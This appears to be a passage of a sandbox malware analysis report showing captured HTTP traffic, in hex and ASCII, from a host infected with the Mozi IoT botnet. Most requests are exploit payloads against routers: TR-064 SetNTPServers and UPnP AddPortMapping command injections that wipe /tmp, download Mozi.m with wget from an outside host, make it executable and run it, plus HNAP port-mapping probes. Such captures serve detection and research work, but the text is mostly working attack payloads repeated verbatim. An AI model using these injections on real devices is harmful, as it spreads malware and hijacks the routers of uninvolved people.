                                                                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                          Jan 6, 2021 19:34:18.421281099 CET1159INHTTP/1.1 400 Bad Request
                                                                                                          Content-Type: text/plain
                                                                                                          Server: proxygen-bolt
                                                                                                          Date: Wed, 06 Jan 2021 18:34:18 GMT
                                                                                                          Connection: close
                                                                                                          Content-Length: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          19192.168.2.2048440188.215.51.1707574
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jan 6, 2021 19:34:24.304819107 CET1186OUTPOST /UD/act?1 HTTP/1.1
                                                                                                          Host: 127.0.0.1:7574
                                                                                                          User-Agent: Hello, world
                                                                                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 640
                                                                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 74 72 30 36 34 20 26 26 20 2f 74 6d 70 2f 74 72 30 36 34 20 74 72 30 36 34 60 3c 2f 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 32 3e 60 65 63 68 6f 20 44 45 41 54 48 60 3c 2f 4e 65 77 4e 54 50 53 65 72 76 65 72 32 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 33 3e 60 65 63 68 6f 20 44 45 41 54 48 60 3c 2f 4e 65 77 4e 54 50 53 65 72 76 65 72 33 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 34 3e 60 65 63 68 6f 20 44 45 41 54 48 60 3c 2f 4e 65 77 4e 54 50 53 65 72 76 65 72 34 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 35 3e 60 65 63 68 6f 20 44 45 41 54 48 60 3c 2f 4e 65 77 4e 54 50 53 65 72 76 65 72 35 3e 3c 2f 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 3e 3c 2f 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 2f 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                          Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
                                                                                                          Jan 6, 2021 19:34:24.570106983 CET1187OUTPOST /UD/act?1 HTTP/1.1
                                                                                                          Host: 127.0.0.1:7574
                                                                                                          User-Agent: Hello, world
                                                                                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 640
                                                                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 74 72 30 36 34
                                                                                                          Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064
                                                                                                          Jan 6, 2021 19:34:25.106101036 CET1188OUTPOST /UD/act?1 HTTP/1.1
                                                                                                          Host: 127.0.0.1:7574
                                                                                                          User-Agent: Hello, world
                                                                                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 640
                                                                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 74 72 30 36 34
                                                                                                          Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064
                                                                                                          Jan 6, 2021 19:34:26.182178974 CET1198OUTPOST /UD/act?1 HTTP/1.1
                                                                                                          Host: 127.0.0.1:7574
                                                                                                          User-Agent: Hello, world
                                                                                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 640
                                                                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 74 72 30 36 34
                                                                                                          Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064
                                                                                                          Jan 6, 2021 19:34:28.334214926 CET1210OUTPOST /UD/act?1 HTTP/1.1
                                                                                                          Host: 127.0.0.1:7574
                                                                                                          User-Agent: Hello, world
                                                                                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 640
                                                                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 74 72 30 36 34
                                                                                                          Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064
                                                                                                          Jan 6, 2021 19:34:32.638447046 CET1231OUTPOST /UD/act?1 HTTP/1.1
                                                                                                          Host: 127.0.0.1:7574
                                                                                                          User-Agent: Hello, world
                                                                                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 640
                                                                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 74 72 30 36 34
                                                                                                          Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064
                                                                                                          Jan 6, 2021 19:34:41.230874062 CET1274OUTPOST /UD/act?1 HTTP/1.1
                                                                                                          Host: 127.0.0.1:7574
                                                                                                          User-Agent: Hello, world
                                                                                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 640
                                                                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 74 72 30 36 34
                                                                                                          Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064
                                                                                                          Jan 6, 2021 19:34:58.447724104 CET1350OUTPOST /UD/act?1 HTTP/1.1
                                                                                                          Host: 127.0.0.1:7574
                                                                                                          User-Agent: Hello, world
                                                                                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 640
                                                                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 74 72 30 36 34
                                                                                                          Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          2192.168.2.2037296195.231.168.4552869
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jan 6, 2021 19:31:50.282007933 CET229OUTPOST /picsdesc.xml HTTP/1.1
                                                                                                          Content-Length: 630
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                          Accept: /
                                                                                                          User-Agent: Hello-World
                                                                                                          Connection: keep-alive
                                                                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 63 64 20 2f 76 61 72 2f 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 3b 20 63 68 6d 6f 64 20 2b 78 20 4d 6f 7a 69 2e 6d 3b 20 2e 2f 4d 6f 7a 69 2e 6d 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                                                                          Jan 6, 2021 19:31:50.538687944 CET230OUTPOST /picsdesc.xml HTTP/1.1
                                                                                                          Content-Length: 630
                                                                                                          Accept-Encoding: gzip, deflate
